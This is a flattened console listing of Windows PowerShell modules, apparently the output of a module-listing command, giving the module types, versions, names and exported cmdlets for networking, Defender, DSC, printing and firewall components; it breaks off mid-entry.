BitsTransfer {Add-BitsFile, Complete-BitsTransfer, Get-BitsTransfer, Remove-BitsTransfer...} Manifest 1.0.0.0 BranchCache {Add-BCDataCacheExtension, Clear-BCCache, Disable-BC, Disable-BCDowngrading...} Cim 1.0.0 BranchCacheClientSettingData Get-BCClientConfiguration Cim 1.0.0 BranchCacheContentServerSettingData Get-BCContentServerConfiguration Cim 1.0.0 BranchCacheHostedCacheServerSett... Get-BCHostedCacheServerConfiguration Cim 1.0.0 BranchCacheNetworkSettingData Get-BCNetworkConfiguration Cim 1.0.0 BranchCacheOrchestrator {Add-BCDataCacheExtension, Clear-BCCache, Disable-BC, Disable-BCDowngrading...} Cim 1.0.0 BranchCachePrimaryPublicationCac... Get-BCHashCache Cim 1.0.0 BranchCachePrimaryRepublicationC... Get-BCDataCache Cim 1.0.0 BranchCacheSecondaryRepublicatio... Get-BCDataCacheExtension Cim 1.0.0 BranchCacheStatus Get-BCStatus Cim 1.0 CIM_PhysicalComputerSystemView {Get-PcsvDevice, Start-PcsvDevice, Stop-PcsvDevice, Restart-PcsvDevice...} Manifest 1.0.0.0 CimCmdlets {Get-CimAssociatedInstance, Get-CimClass, Get-CimInstance, Get-CimSession...} Script 0.0 CmdletHelpers {CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace, Get-NetworkSwitchImplementationNamespace, New-LocalCimInstance...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 CompositeResourceHelper {BuildResourceCommonParameters, BuildResourceString} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 1.0 ConfigCI {Get-SystemDriver, New-CIPolicyRule, New-CIPolicy, Get-CIPolicy...} Manifest 1.0 Defender {Get-MpPreference, Set-MpPreference, Add-MpPreference, Remove-MpPreference...} Manifest 1.0.0.0 DirectAccessClientComponents {Disable-DAManualEntryPointSelection, Enable-DAManualEntryPointSelection, Get-DAClientExperienceConfiguration, Get-DAEntryPointTableItem...} Cim 2.0.0.0 Disable-DscDebug Disable-DscDebug Cim 1.0.0.0 Disk {Get-Disk, Initialize-Disk, Clear-Disk, New-Partition...} Cim 1.0.0.0 DiskImage {Get-DiskImage, Mount-DiskImage, Dismount-DiskImage} Script 3.0 Dism {Add-AppxProvisionedPackage, Add-WindowsDriver, Add-WindowsCapability, Add-WindowsImage...} Script 3.0 Dism {Add-AppxProvisionedPackage, Add-WindowsDriver, Add-WindowsCapability, Add-WindowsImage...} Manifest 1.0.0.0 DnsClient {Resolve-DnsName, Clear-DnsClientCache, Get-DnsClient, Get-DnsClientCache...} Binary 10.0.0.0 dnslookup Resolve-DnsName Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DownloadManager ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 1.0 DSCFileDownloadManager {Get-DscAction, Get-DSCDocument, Get-DSCModule} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 DSCResourceHelper IsNanoServer Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 2.0.0.0 Enable-DscDebug Enable-DscDebug Manifest 1.0.0.0 EventTracingManagement {New-EtwTraceSession, Get-EtwTraceSession, Set-EtwTraceSession, Send-EtwTraceSession...} Cim 1.0.0.0 FileIntegrity {Get-FileIntegrity, Set-FileIntegrity, Repair-FileIntegrity} Cim 1.0.0.0 FileServer {Get-StorageFileServer, Remove-StorageFileServer, Set-StorageFileServer, New-FileShare} Cim 1.0.0.0 FileShare {Get-FileShare, Remove-FileShare, Grant-FileShareAccess, Block-FileShareAccess...} Cim 1.0.0.0 FileStorageTier {Get-FileStorageTier, Set-FileStorageTier, Clear-FileStorageTier} Cim 2.0.0.0 Get-DscConfiguration Get-DscConfiguration Cim 2.0.0.0 Get-DscConfigurationStatus Get-DscConfigurationStatus Cim 2.0.0.0 Get-DSCLocalConfigurationManager Get-DscLocalConfigurationManager Script 0.0 GetStartApps {Get-StartApps, Get-AllStartApps} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 1.0 GroupSet {BuildResourceCommonParameters, BuildResourceString} Script 1.0 GroupSet {BuildResourceCommonParameters, BuildResourceString} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0.0.0 InitiatorId {Get-InitiatorId, Remove-InitiatorId} Cim 1.0.0.0 InitiatorPort {Get-InitiatorPort, Set-InitiatorPort} Manifest 2.0.0.0 International {Get-WinDefaultInputMethodOverride, Set-WinDefaultInputMethodOverride, Get-WinHomeLocation, Set-WinHomeLocation...} Manifest 1.0.0.0 iSCSI {Get-IscsiTargetPortal, New-IscsiTargetPortal, Remove-IscsiTargetPortal, Update-IscsiTargetPortal...} Cim 1.0 iSCSIConnection Get-IscsiConnection Cim 1.0 iSCSISession {Get-IscsiSession, Unregister-IscsiSession, Register-IscsiSession, Set-IscsiChapSecret} Cim 1.0 iSCSITarget {Get-IscsiTarget, Disconnect-IscsiTarget, Update-IscsiTarget, Connect-IscsiTarget} Cim 1.0 iSCSITargetPortal {Get-IscsiTargetPortal, Remove-IscsiTargetPortal, Update-IscsiTargetPortal, New-IscsiTargetPortal} Script 1.0.0.0 ise {New-IseSnippet, Import-IseSnippet, Get-IseSnippet} Script 0.0 ise {Import-IseSnippet, Get-IseSnippet, New-IseSnippet} Manifest 1.0.0.0 Kds {Add-KdsRootKey, Get-KdsRootKey, Test-KdsRootKey, Set-KdsConfiguration...} Cim 1.0.0.0 MaskingSet {Get-MaskingSet, Remove-MaskingSet, Rename-MaskingSet, Add-InitiatorIdToMaskingSet...} Binary 10.0.0.0 Microsoft.AppV.AppvClientComCons... Binary 10.0.0.0 Microsoft.AppV.AppVClientPowerShell {Add-AppvClientConnectionGroup, Add-AppvClientPackage, Add-AppvPublishingServer, Disable-Appv...} Binary 0.0.0.0 Microsoft.AppV.ClientProgrammabi... Binary 0.0.0.0 Microsoft.BackgroundIntelligentT... Binary 0.0.0.0 Microsoft.BitLocker.Structures Binary 10.0.0.0 Microsoft.Dism.PowerShell {Add-WindowsPackage, Remove-WindowsPackage, Get-WindowsPackage, Enable-WindowsOptionalFeature...} Manifest 1.0.1.0 Microsoft.PowerShell.Archive {Compress-Archive, Expand-Archive} Script 0.0 Microsoft.PowerShell.Archive {Compress-Archive, Expand-Archive, GetResolvedPathHelper, Add-CompressionAssemblies...} Manifest 3.0.0.0 Microsoft.PowerShell.Diagnostics {Get-WinEvent, Get-Counter, Import-Counter, Export-Counter...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DownloadManager ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Binary 3.0.0.0 Microsoft.PowerShell.DSC.FileDow... {Get-DscAction, Get-DSCDocument, Get-DSCModule} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 3.0.0.0 Microsoft.PowerShell.Host {Start-Transcript, Stop-Transcript} Binary 3.0.0.0 Microsoft.PowerShell.LocalAccounts {Add-LocalGroupMember, Disable-LocalUser, Enable-LocalUser, Get-LocalGroup...} Manifest 1.0.0.0 Microsoft.PowerShell.LocalAccounts {Add-LocalGroupMember, Disable-LocalUser, Enable-LocalUser, Get-LocalGroup...} Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Content, Clear-Content, Clear-ItemProperty, Join-Path...} Script 1.0 Microsoft.PowerShell.ODataUtils Export-ODataEndpointProxy Script 1.0 Microsoft.PowerShell.ODataUtils Export-ODataEndpointProxy Manifest 3.0.0.0 Microsoft.PowerShell.Security {Get-Acl, Set-Acl, Get-PfxCertificate, Get-Credential...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Format-List, Format-Custom, Format-Table, Format-Wide...} Script 0.0 Microsoft.PowerShell.Utility {Get-FileHash, New-TemporaryFile, New-Guid, Format-Hex...} Binary 10.0.0.0 Microsoft.Uev.Commands {Clear-UevConfiguration, Clear-UevAppxPackage, Restore-UevBackup, Set-UevTemplateProfile...} Binary 10.0.0.0 Microsoft.Windows.AppBackgroundT... {Enable-AppBackgroundTaskDiagnosticLog, Disable-AppBackgroundTaskDiagnosticLog, Set-AppBackgroundTaskResourcePolicy} Binary 10.0.0.0 Microsoft.Windows.Firewall.Commands {New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal, Get-DAPolicyChange} Binary 10.0.0.0 Microsoft.WindowsErrorReporting.... {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting} Binary 10.0.0.0 Microsoft.WindowsSearch.Commands {Get-WindowsSearchSetting, Set-WindowsSearchSetting} Manifest 3.0.0.0 Microsoft.WSMan.Management {Disable-WSManCredSSP, Enable-WSManCredSSP, Get-WSManCredSSP, Set-WSManQuickConfig...} Manifest 1.0 MMAgent {Disable-MMAgent, Enable-MMAgent, Set-MMAgent, Get-MMAgent...} Manifest 1.0.0.0 MsDtc {New-DtcDiagnosticTransaction, Complete-DtcDiagnosticTransaction, Join-DtcDiagnosticResourceManager, Receive-DtcDiagnosticTransaction...} Cim 1.0 MSFT_3DPrinter_v1.0 Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_ArchiveResource {Test-TargetResource, Set-TargetResource, Get-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0.0.0 MSFT_AutologgerConfig_v1.0 {Get-AutologgerConfig, Set-AutologgerConfig, Remove-AutologgerConfig, New-AutologgerConfig} Cim 1.0 MSFT_DAClientExperienceConfigura... {Get-DAClientExperienceConfiguration, Set-DAClientExperienceConfiguration, Reset-DAClientExperienceConfiguration} Cim 1.0 MSFT_DAConnectionStatus Get-DAConnectionStatus Cim 1.0 MSFT_DASiteTableEntry {Get-DAEntryPointTableItem, Set-DAEntryPointTableItem, Remove-DAEntryPointTableItem, Reset-DAEntryPointTableItem...} Cim 1.0.0 MSFT_DnsClient {Get-DnsClient, Set-DnsClient, Register-DnsClient} Cim 1.0.0 MSFT_DnsClientCache {Get-DnsClientCache, Clear-DnsClientCache} Cim 1.0.0 MSFT_DnsClientGlobalSetting {Get-DnsClientGlobalSetting, Set-DnsClientGlobalSetting} Cim 1.0.0 MSFT_DnsClientServerAddress {Get-DnsClientServerAddress, Set-DnsClientServerAddress} Cim 1.0 MSFT_DtcAdvancedHostSettingTask_... {Get-DtcAdvancedHostSetting, Set-DtcAdvancedHostSetting} Cim 1.0 MSFT_DtcAdvancedSettingTask_v1.0 {Get-DtcAdvancedSetting, Set-DtcAdvancedSetting} Cim 1.0 MSFT_DtcClusterDefaultTask_v1.0 {Get-DtcClusterDefault, Set-DtcClusterDefault} Cim 1.0 MSFT_DtcClusterTMMappingTask_v1.0 {Add-DtcClusterTMMapping, Get-DtcClusterTMMapping, Remove-DtcClusterTMMapping, Set-DtcClusterTMMapping} Cim 1.0 MSFT_DtcDefaultTask_v1.0 {Get-DtcDefault, Set-DtcDefault} Cim 1.0 MSFT_DtcLogTask_v1.0 {Get-DtcLog, Reset-DtcLog, Set-DtcLog} Cim 1.0 MSFT_DtcNetworkSettingTask_v1.0 {Get-DtcNetworkSetting, Set-DtcNetworkSetting} Cim 1.0 MSFT_DtcTask_v1.0 {Get-Dtc, Install-Dtc, Start-Dtc, Stop-Dtc...} Cim 1.0 MSFT_DtcTransactionsStatisticsTa... Get-DtcTransactionsStatistics Cim 1.0 MSFT_DtcTransactionsTraceSession... {Get-DtcTransactionsTraceSession, Set-DtcTransactionsTraceSession, Start-DtcTransactionsTraceSession, Stop-DtcTransactionsTraceSession...} Cim 1.0 MSFT_DtcTransactionsTraceSetting... {Get-DtcTransactionsTraceSetting, Set-DtcTransactionsTraceSetting} Cim 1.0 MSFT_DtcTransactionTask_v1.0 {Get-DtcTransaction, Set-DtcTransaction} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_EnvironmentResource {Get-TargetResource, Set-TargetResource, Test-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0.0.0 MSFT_EtwTraceProvider_v1.0 {Get-EtwTraceProvider, Set-EtwTraceProvider, Remove-EtwTraceProvider, Add-EtwTraceProvider} Cim 1.0.0.0 MSFT_EtwTraceSession_v1.0 {Get-EtwTraceSession, Remove-EtwTraceSession, Set-EtwTraceSession, Send-EtwTraceSession...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_GroupResource {Get-TargetResource, Set-TargetResource, Test-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 MSFT_LocalPrinterPort_v1.0 Cim 1.0 MSFT_LprPrinterPort_v1.0 Cim 1.0 MSFT_MpComputerStatus Get-MpComputerStatus Cim 1.0 MSFT_MpPreference {Get-MpPreference, Set-MpPreference, Add-MpPreference, Remove-MpPreference} Cim 1.0 MSFT_MpScan Start-MpScan Cim 1.0 MSFT_MpSignature Update-MpSignature Cim 1.0 MSFT_MpThreat {Get-MpThreat, Remove-MpThreat} Cim 1.0 MSFT_MpThreatCatalog Get-MpThreatCatalog Cim 1.0 MSFT_MpThreatDetection Get-MpThreatDetection Cim 1.0 MSFT_MpWDOScan Start-MpWDOScan Cim 1.0 MSFT_NCSIPolicyConfiguration {Get-NCSIPolicyConfiguration, Set-NCSIPolicyConfiguration, Reset-NCSIPolicyConfiguration} Cim 1.0 MSFT_Net6to4Configuration {Get-Net6to4Configuration, Set-Net6to4Configuration, Reset-Net6to4Configuration} Cim 1.0 MSFT_NetAdapter.cmdletDefinition {Get-NetAdapter, Enable-NetAdapter, Disable-NetAdapter, Restart-NetAdapter...} Cim 1.0 MSFT_NetAdapterAdvancedProperty.... {Get-NetAdapterAdvancedProperty, Set-NetAdapterAdvancedProperty, Remove-NetAdapterAdvancedProperty, Reset-NetAdapterAdvancedProperty...} Cim 1.0 MSFT_NetAdapterBinding.cmdletDef... {Get-NetAdapterBinding, Set-NetAdapterBinding, Enable-NetAdapterBinding, Disable-NetAdapterBinding} Cim 1.0 MSFT_NetAdapterChecksumOffload {Get-NetAdapterChecksumOffload, Set-NetAdapterChecksumOffload, Enable-NetAdapterChecksumOffload, Disable-NetAdapterChecksumOffload} Cim 1.0 MSFT_NetAdapterEncapsulatedPacke... {Get-NetAdapterEncapsulatedPacketTaskOffload, Set-NetAdapterEncapsulatedPacketTaskOffload, Enable-NetAdapterEncapsulatedPacketTaskOffload, Di... Cim 1.0 MSFT_NetAdapterHardwareInfo.cmdl... Get-NetAdapterHardwareInfo Cim 1.0 MSFT_NetAdapterIPsecOffload {Get-NetAdapterIPsecOffload, Set-NetAdapterIPsecOffload, Enable-NetAdapterIPsecOffload, Disable-NetAdapterIPsecOffload} Cim 1.0 MSFT_NetAdapterLso {Get-NetAdapterLso, Set-NetAdapterLso, Enable-NetAdapterLso, Disable-NetAdapterLso} Cim 1.0 MSFT_NetAdapterPacketDirect {Get-NetAdapterPacketDirect, Set-NetAdapterPacketDirect, Enable-NetAdapterPacketDirect, Disable-NetAdapterPacketDirect} Cim 1.0 MSFT_NetAdapterPowerManagement.c... {Get-NetAdapterPowerManagement, Set-NetAdapterPowerManagement, Enable-NetAdapterPowerManagement, Disable-NetAdapterPowerManagement} Script 0.0 MSFT_NetAdapterPowerManagement.F... {Format-NdisConfigurationValue, Format-WakePatternType, Format-BitmapWakePattern} Cim 1.0 MSFT_NetAdapterQos {Get-NetAdapterQos, Set-NetAdapterQos, Enable-NetAdapterQos, Disable-NetAdapterQos} Script 0.0 MSFT_NetAdapterQos.Format.Helper {Format-NetAdapterQosIntegerArray, Format-NetAdapterQosTrafficClass, Format-NetAdapterQosFlowControl, Format-NetAdapterQosClassification} Cim 1.0 MSFT_NetAdapterRdma {Get-NetAdapterRdma, Set-NetAdapterRdma, Enable-NetAdapterRdma, Disable-NetAdapterRdma} Cim 1.0 MSFT_NetAdapterRsc {Get-NetAdapterRsc, Set-NetAdapterRsc, Enable-NetAdapterRsc, Disable-NetAdapterRsc} Cim 1.0 MSFT_NetAdapterRss.cmdletDefinition {Get-NetAdapterRss, Set-NetAdapterRss, Enable-NetAdapterRss, Disable-NetAdapterRss} Cim 1.0 MSFT_NetAdapterSriov {Get-NetAdapterSriov, Set-NetAdapterSriov, Enable-NetAdapterSriov, Disable-NetAdapterSriov} Cim 1.0 MSFT_NetAdapterSriovVf.cmdletDef... Get-NetAdapterSriovVf Cim 1.0 MSFT_NetAdapterStatistics.cmdlet... Get-NetAdapterStatistics Cim 1.0 MSFT_NetAdapterVmq.cmdletDefinition {Get-NetAdapterVmq, Set-NetAdapterVmq, Enable-NetAdapterVmq, Disable-NetAdapterVmq} Cim 1.0 MSFT_NetAdapterVmqQueue.cmdletDe... Get-NetAdapterVmqQueue Cim 1.0 MSFT_NetAdapterVPort.cmdletDefin... Get-NetAdapterVPort Cim 1.0 MSFT_NetCompartment Get-NetCompartment Cim 1.0 MSFT_NetConnectionProfile {Get-NetConnectionProfile, Set-NetConnectionProfile} Cim 1.0 MSFT_NetDnsTransitionConfiguration {Get-NetDnsTransitionConfiguration, Enable-NetDnsTransitionConfiguration, Disable-NetDnsTransitionConfiguration, Reset-NetDnsTransitionConfig... Cim 1.0 MSFT_NetDnsTransitionMonitoring Get-NetDnsTransitionMonitoring Cim 1.1 MSFT_NetEventNetworkAdapter {Get-NetEventNetworkAdapter, Remove-NetEventNetworkAdapter, Add-NetEventNetworkAdapter} Cim 1.0 MSFT_NetEventPacketCaptureProvider {Get-NetEventPacketCaptureProvider, Remove-NetEventPacketCaptureProvider, Set-NetEventPacketCaptureProvider, Add-NetEventPacketCaptureProvider} Cim 1.0 MSFT_NetEventProvider {Get-NetEventProvider, Remove-NetEventProvider, Set-NetEventProvider, Add-NetEventProvider} Cim 1.0 MSFT_NetEventSession {Get-NetEventSession, Remove-NetEventSession, Set-NetEventSession, Start-NetEventSession...} Cim 1.0 MSFT_NetEventVFPProvider {Get-NetEventVFPProvider, Remove-NetEventVFPProvider, Set-NetEventVFPProvider, Add-NetEventVFPProvider} Cim 1.0 MSFT_NetEventVmNetworkAdatper {Get-NetEventVmNetworkAdapter, Remove-NetEventVmNetworkAdapter, Add-NetEventVmNetworkAdapter} Cim 1.0 MSFT_NetEventVmSwitch {Get-NetEventVmSwitch, Remove-NetEventVmSwitch, Add-NetEventVmSwitch} Cim 1.0 MSFT_NetEventVmSwitchProvider {Get-NetEventVmSwitchProvider, Remove-NetEventVmSwitchProvider, Set-NetEventVmSwitchProvider, Add-NetEventVmSwitchProvider} Cim 1.0 MSFT_NetEventWFPCaptureProvider {Get-NetEventWFPCaptureProvider, Remove-NetEventWFPCaptureProvider, Set-NetEventWFPCaptureProvider, Add-NetEventWFPCaptureProvider} Cim 1.0.0 MSFT_NetIPAddress {Get-NetIPAddress, Set-NetIPAddress, Remove-NetIPAddress, New-NetIPAddress} Cim 1.0 MSFT_NetIpHTTPsConfiguration {Get-NetIPHttpsConfiguration, Set-NetIPHttpsConfiguration, Remove-NetIPHttpsConfiguration, Reset-NetIPHttpsConfiguration...} Cim 1.0 MSFT_NetIpHTTPsState Get-NetIPHttpsState Cim 1.0.0 MSFT_NetIPInterface {Get-NetIPInterface, Set-NetIPInterface} Cim 1.0.0 MSFT_NetIPv4Protocol {Get-NetIPv4Protocol, Set-NetIPv4Protocol} Cim 1.0.0 MSFT_NetIPv6Protocol {Get-NetIPv6Protocol, Set-NetIPv6Protocol} Cim 1.0 MSFT_NetISATAPConfiguration {Get-NetIsatapConfiguration, Set-NetIsatapConfiguration, Reset-NetIsatapConfiguration} Cim 1.0 MSFT_NetLbfoTeam {Get-NetLbfoTeam, Remove-NetLbfoTeam, Set-NetLbfoTeam, New-NetLbfoTeam...} Cim 1.0 MSFT_NetLbfoTeamMember {Get-NetLbfoTeamMember, Set-NetLbfoTeamMember, Remove-NetLbfoTeamMember, Add-NetLbfoTeamMember} Cim 1.0 MSFT_NetLbfoTeamNic {Get-NetLbfoTeamNic, Set-NetLbfoTeamNic, Remove-NetLbfoTeamNic, Add-NetLbfoTeamNic} Cim 1.0 MSFT_NetNat {Get-NetNat, Set-NetNat, Remove-NetNat, New-NetNat} Cim 1.0 MSFT_NetNatExternalAddress {Get-NetNatExternalAddress, Remove-NetNatExternalAddress, Add-NetNatExternalAddress} Cim 1.0 MSFT_NetNatGlobal {Get-NetNatGlobal, Set-NetNatGlobal} Cim 1.0 MSFT_NetNatSession Get-NetNatSession Cim 1.0 MSFT_NetNatStaticMapping {Get-NetNatStaticMapping, Remove-NetNatStaticMapping, Add-NetNatStaticMapping} Cim 1.0 MSFT_NetNatTransitionConfiguration {Get-NetNatTransitionConfiguration, Set-NetNatTransitionConfiguration, Enable-NetNatTransitionConfiguration, Disable-NetNatTransitionConfigur... Cim 1.0 MSFT_NetNatTransitionMonitoring Get-NetNatTransitionMonitoring Cim 1.0.0 MSFT_NetNeighbor {Get-NetNeighbor, Set-NetNeighbor, Remove-NetNeighbor, New-NetNeighbor} Cim 1.0.0 MSFT_NetOffloadGlobalSetting {Get-NetOffloadGlobalSetting, Set-NetOffloadGlobalSetting} Cim 1.0.0 MSFT_NetPrefixPolicy Get-NetPrefixPolicy Cim 1.0 MSFT_NetQosPolicy {Get-NetQosPolicy, Set-NetQosPolicy, Remove-NetQosPolicy, New-NetQosPolicy} Script 0.0 MSFT_NetQosPolicy.Format.Helper Format-NetQosPolicySpeed Cim 1.0.0 MSFT_NetRoute {Get-NetRoute, Set-NetRoute, Remove-NetRoute, New-NetRoute...} Cim 1.0 MSFT_NetSwitchTeam {Get-NetSwitchTeam, Remove-NetSwitchTeam, New-NetSwitchTeam, Rename-NetSwitchTeam...} Cim 1.0 MSFT_NetSwitchTeamMember Get-NetSwitchTeamMember Cim 1.0.0 MSFT_NetTCPConnection Get-NetTCPConnection Cim 1.0.0 MSFT_NetTCPSetting {Get-NetTCPSetting, Set-NetTCPSetting} Cim 1.0 MSFT_NetTeredoConfiguration {Get-NetTeredoConfiguration, Set-NetTeredoConfiguration, Reset-NetTeredoConfiguration} Cim 1.0 MSFT_NetTeredoState Get-NetTeredoState Cim 1.0.0 MSFT_NetTransportFilter {Get-NetTransportFilter, Remove-NetTransportFilter, New-NetTransportFilter} Cim 1.0.0 MSFT_NetUDPEndpoint Get-NetUDPEndpoint Cim 1.0.0 MSFT_NetUDPSetting {Get-NetUDPSetting, Set-NetUDPSetting} Cim 1.0 MSFT_OdbcDriverTask_v1.0 {Get-OdbcDriver, Set-OdbcDriver} Cim 1.0 MSFT_OdbcDsnTask_v1.0 {Add-OdbcDsn, Get-OdbcDsn, Remove-OdbcDsn, Set-OdbcDsn} Cim 1.0 MSFT_OdbcPerfCounterTask_v1.0 {Disable-OdbcPerfCounter, Enable-OdbcPerfCounter, Get-OdbcPerfCounter} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_PackageResource {Test-TargetResource, Get-TargetResource, Set-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 MSFT_Printer_v1.0 {Get-Printer, Remove-Printer, Set-Printer, Add-Printer...} Cim 1.0 MSFT_PrinterConfiguration_v1.0 {Get-PrintConfiguration, Set-PrintConfiguration} Cim 1.0 MSFT_PrinterDriver_v1.0 {Get-PrinterDriver, Remove-PrinterDriver, Add-PrinterDriver} Cim 1.0 MSFT_PrinterNfcTag_v1.0 Cim 1.0 MSFT_PrinterNfcTagTasks_v1.0 {Read-PrinterNfcTag, Write-PrinterNfcTag} Cim 1.0 MSFT_PrinterPort_v1.0 {Get-PrinterPort, Remove-PrinterPort} Cim 1.0 MSFT_PrinterPortTasks_v1.0 Add-PrinterPort Cim 1.0 MSFT_PrinterProperty_v1.0 {Get-PrinterProperty, Set-PrinterProperty} Cim 1.0 MSFT_PrintJob_v1.0 {Get-PrintJob, Remove-PrintJob, Restart-PrintJob, Resume-PrintJob...} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_ProcessResource {Get-TargetResource, Set-TargetResource, Test-TargetResource} Script 0.0 MSFT_RegistryResource {Get-TargetResource, Set-TargetResource, Test-TargetResource} Script 0.0 MSFT_RoleResource {Get-TargetResource, Set-TargetResource, Test-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 MSFT_ScheduledTask_v1.0 {Get-ScheduledTask, Unregister-ScheduledTask} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_ScriptResource {Get-TargetResource, Set-TargetResource, Test-TargetResource} Script 0.0 MSFT_ServiceResource {Get-TargetResource, Test-TargetResource, Set-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 MSFT_TcpIpPrinterPort_v1.0 Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_UserResource {Get-TargetResource, Set-TargetResource, Test-TargetResource} Script 0.0 MSFT_WaitForAll {Get-TargetResource, Set-TargetResource, Test-TargetResource} Script 0.0 MSFT_WaitForAny {Get-TargetResource, Set-TargetResource, Test-TargetResource} Script 0.0 MSFT_WaitForSome {Get-TargetResource, Set-TargetResource, Test-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 MSFT_WdacBidTraceTask_v1.0 {Disable-WdacBidTrace, Enable-WdacBidTrace, Get-WdacBidTrace} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Script 0.0 MSFT_WindowsOptionalFeature {Get-TargetResource, Set-TargetResource, Test-TargetResource} Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Cim 1.0 MSFT_WsdPrinterPort_v1.0 Manifest 2.0.0.0 NetAdapter {Disable-NetAdapter, Disable-NetAdapterBinding, Disable-NetAdapterChecksumOffload, Disable-NetAdapterEncapsulatedPacketTaskOffload...} Script 0.0 NetAdapter.Format.Helper {Format-MacAddress, Format-AdapterName, Format-AdapterInstanceID, Format-LinkSpeed} Manifest 1.0.0.0 NetConnection {Get-NetConnectionProfile, Set-NetConnectionProfile} Manifest 1.0.0.0 NetEventPacketCapture {New-NetEventSession, Remove-NetEventSession, Get-NetEventSession, Set-NetEventSession...} Cim 1.0.0.0 NetFirewallAddressFilter.cmdletD... {Get-NetFirewallAddressFilter, Set-NetFirewallAddressFilter} Cim 1.0.0.0 NetFirewallApplicationFilter.cmd... {Get-NetFirewallApplicationFilter, Set-NetFirewallApplicationFilter} Cim 1.0.0.0 NetFirewallInterfaceFilter.cmdle... {Get-NetFirewallInterfaceFilter, Set-NetFirewallInterfaceFilter} Cim 1.0.0.0 NetFirewallInterfaceTypeFilter.c... {Get-NetFirewallInterfaceTypeFilter, Set-NetFirewallInterfaceTypeFilter} Cim 1.0.0.0 NetFirewallPortFilter.cmdletDefi... {Get-NetFirewallPortFilter, Set-NetFirewallPortFilter} Cim 1.0.0.0 NetFirewallProfile.cmdletDefinition {Get-NetFirewallProfile, Set-NetFirewallProfile} Cim 1.0.0.0 NetFirewallRule.cmdletDefinition {Get-NetFirewallRule, Set-NetFirewallRule, Remove-NetFirewallRule, Rename-NetFirewallRule...} Cim 1.0.0.0 NetFirewallSecurityFilter.cmdlet... {Get-NetFirewallSecurityFilter, Set-NetFirewallSecurityFilter} Cim 1.0.0.0 NetFirewallServiceFilter.cmdletD... {Get-NetFirewallServiceFilter, Set-NetFirewallServiceFilter} Cim 1.0.0.0 NetFirewallSetting.cmdletDefinition {Get-NetFirewallSetting, Set-NetFirewallSetting} Cim 1.0.0.0 NetGPO.cmdletDefinition {Open-NetGPO, Save-NetGPO} Script 0.0 NetIPConfiguration {Get-NetIPConfiguration, gip} Cim 1.0.0.0 NetIPsecDospSetting.cmdletDefini... {Get-NetIPsecDospSetting, Set-NetIPsecDospSetting, Remove-NetIPsecDospSetting, New-NetIPsecDospSetting} Cim 